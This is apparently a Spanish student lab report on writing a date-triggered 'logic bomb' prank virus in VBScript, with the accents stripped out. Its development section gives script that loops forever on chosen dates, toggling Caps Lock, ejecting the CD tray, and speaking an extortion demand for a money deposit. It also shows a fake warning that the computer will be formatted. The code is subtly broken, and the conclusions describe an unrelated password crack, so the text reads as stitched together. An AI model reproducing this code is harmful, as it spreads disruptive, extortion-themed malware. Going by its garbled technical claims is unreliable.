Está en la página 1de 6

INSTITUTO POLITCNICO NACIONAL

UNIDAD PROFESIONAL INTERDISCIPLINARIA DE


INGENIERA Y CIENCIAS SOCIALES Y
ADMINISTRATIVAS
Calle Te No. 950 Colonia Granjas Mxico, Delegacin
Iztacalco, C.P.08400

ASIGNATURA
Virologa y Criptografa

PRACTICA

VIROLOGA: VIRUS BOMBA"

ALUMNA: Hernndez Laureano Mayte

PROFESOR
Garduo Mendieta Vctor

SECUENCIA
4NM74

ndice
INTRODUCCIN................................................................................................... 3

CONSIDERACIONES TERICAS............................................................................ 3
DESARROLLO...................................................................................................... 4
OBSERVACIONES................................................................................................. 6
CONCLUSIONES................................................................................................... 7
BIBLIOGRAFA...................................................................................................... 8

INTRODUCCIN
Algunos de los primeros programas infecciosos, incluido el primer gusano de
Internet y algunos virus de MS-DOS, fueron elaborados como experimentos, como
bromas o simplemente como algo molesto, no para causar graves daos en las
computadoras. En algunos casos el programador no se daba cuenta de cunto
dao poda hacer su creacin. Algunos jvenes que estaban aprendiendo sobre
2

los virus los crearon con el nico propsito de demostrar que podan hacerlo o
simplemente para ver con qu velocidad se propagaban. Incluso en 1999 un virus
tan extendido como Melissa pareca haber sido elaborado tan slo como una
travesura.
El software diseado para causar daos o prdida de datos suele estar
relacionado con actos de vandalismo. Muchos virus son diseados para destruir
archivos en discos duros o para corromper el sistema de archivos escribiendo
datos invlidos. Algunos gusanos son diseados para ensuciar pginas web
dejando escrito el alias del autor o del grupo por todos los sitios por donde pasan.
Estos gusanos pueden parecer el equivalente informtico del grafiti.
Sin embargo, debido al aumento de usuarios de Internet, el software malicioso ha
llegado a ser diseado para sacar beneficio de l, ya sea legal o ilegalmente.
Desde 2003, la mayor parte de los virus y gusanos han sido diseados para tomar
control de computadoras para su explotacin en el mercado negro.
Estas computadoras infectadas ("computadoras zombie") son usadas para el
envo masivo de spam por e_mail, para alojar datos ilegales como pornografa
infantil, o para unirse en ataques DDoS (una ampliacin del ataque Dos es el
llamado ataque distribuido de denegacin de servicio, tambin llamado ataque
DDoS -de las siglas en ingls Distributed Denial of Service- el cual lleva a cabo
generando un gran flujo de informacin desde varios puntos de conexin.) como
forma de extorsin entre otras cosas.

CONSIDERACIONES TERICAS
Los troyanos estn diseados para permitir a un individuo el acceso remoto a un
sistema. Una vez ejecutado el troyano, el individuo puede acceder al sistema de
forma remota y realizar diferentes acciones sin necesitar permiso. Las acciones
que el individuo puede realizar en el equipo remoto, dependen de los privilegios
que tenga el usuario en el ordenador remoto y de las caractersticas del troyano.
Algunas de las operaciones que se pueden llevar a cabo en el ordenador remoto
son:

Utilizar la mquina como parte de una botnet (por ejemplo para realizar
ataques de denegacin de servicio o envo de spam).
Instalacin de otros programas (incluyendo otros maliciosos).
Robo de informacin personal: informacin bancaria, contraseas, cdigos
de seguridad...
Borrado, modificacin o transferencia de archivos (descarga o subida).
Ejecutar o terminar procesos.
Apagar o reiniciar el equipo.
Monitorizar las pulsaciones del teclado.
3

Realizar capturas de pantalla.


Ocupar el espacio libre del disco duro con archivos intiles.
Monitorizacin del sistema y seguimiento de las acciones del usuario.
Miscelnea (acciones "graciosas" tales como expulsar la unidad de CD,
cambiar la apariencia del sistema, etc.)
Sacar fotos por la webcam si tiene.
Borra el disco

Hoy en da, dada la popularidad de los sistemas para dispositivos mviles y


tabletas, especialmente aquellos con menor control en su marketplace de
aplicaciones (como Android) son foco de creciente inters para los desarrolladores
de este tipo de malware. En el caso de estos dispositivos, las acciones que un
atacante puede llegar a realizar son similares a las anteriores pero dada la
naturaleza del dispositivo, el abanico de opciones se ampla. Algunos ejemplos
son:

Captura de mensajes de texto entrantes y salientes.


Captura del registro de llamadas.
Habilidad para acceder (consultar, eliminar y modificar) la agenda de
contactos.
Habilidad para efectuar llamadas y enviar SMS.
Conocimiento de la posicin geogrfica del dispositivo mediante GPS.

DESARROLLO
Este virus Bomba se ejecuta cierta fecha a cierta hora, a continuacin se
muestra el desarrollo.
Creamos un archivo de tecxto y lo guardamos con el nombre que gusten solo
que con la extensin .vbs en mi caso yole puse bomba.vbs. Al abrir el
documento metemoes el siguiete codigo:

Do
//En esta parte voy adquirir el da, mes y ao de la computadora
dia= Day (Date)
mes = Month(Date)
anio = year (Date)

fecha= dia&"/"&mes&"/"&anio
// en este apartado decimos que SI la fecha de la computadora coincide con
4

la fecha que yo quiero, ejectuta el virus.. el OR nos sirve para aadir mas
fechas
If fecha = "13/4/2016" OR fecha = "21/4/2016" Then
do
//estas lneas, prenden y apagan las luces de la computadora
Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys"{CAPSLOCK}"
//se abre la lectora de CD sola
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
colCDROMs.Item(i).Eject
//En esta parte la computadora habla sola con el mensaje que le pongamos
(funciona solo con Windows 8)
MsgBox "SE lo que hiciste el verano pasado",48
Dim speaks, speech
speaks="Deposita 5,000 a esta cuenta 00123456789 y te dejar"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
//va a mandar mensajes de texto
MsgBox "sabes que va a pasar hoy?",48
MsgBox "TU COMPUTADORA SE VA A FORMATEAR SINO LA APAGAS",48
loop
End If
Dentro del codigo de progamacion buscamos la clave de rror al ingresar la contrasea y
posteriormente en ese conjunto de logica selleccionamos para modificar el procesamiento de lote,
cambiamos solo la primer linea a LYN guardamos los cambios y cerramos el programa.

OBSERVACIONES
Se logr crear el virus fcilmente solo identificando y cambiando el conjunto de procesamiento de
lotes ubicando el mensaje de error para cambiar el ciclo de respuesta.

CONCLUSIONES
Gracias a la realizacin de esta prctica logramos comprobar que los crack son fcil mente
programables siempre y cuando se localice el ciclo de procesamiento que hace que el programa se
detenga o interrumpa el proceso de ejecucin
Adems aprendimos que es necesario reprogramar ciertas lneas de cdigo para lograr hacer las
instrucciones deseadas con el crack, el cual puede variar mucho dependiendo el ciclo de comando.

BIBLIOGRAFA

Emudesc.com

Indetectables.com.ar

También podría gustarte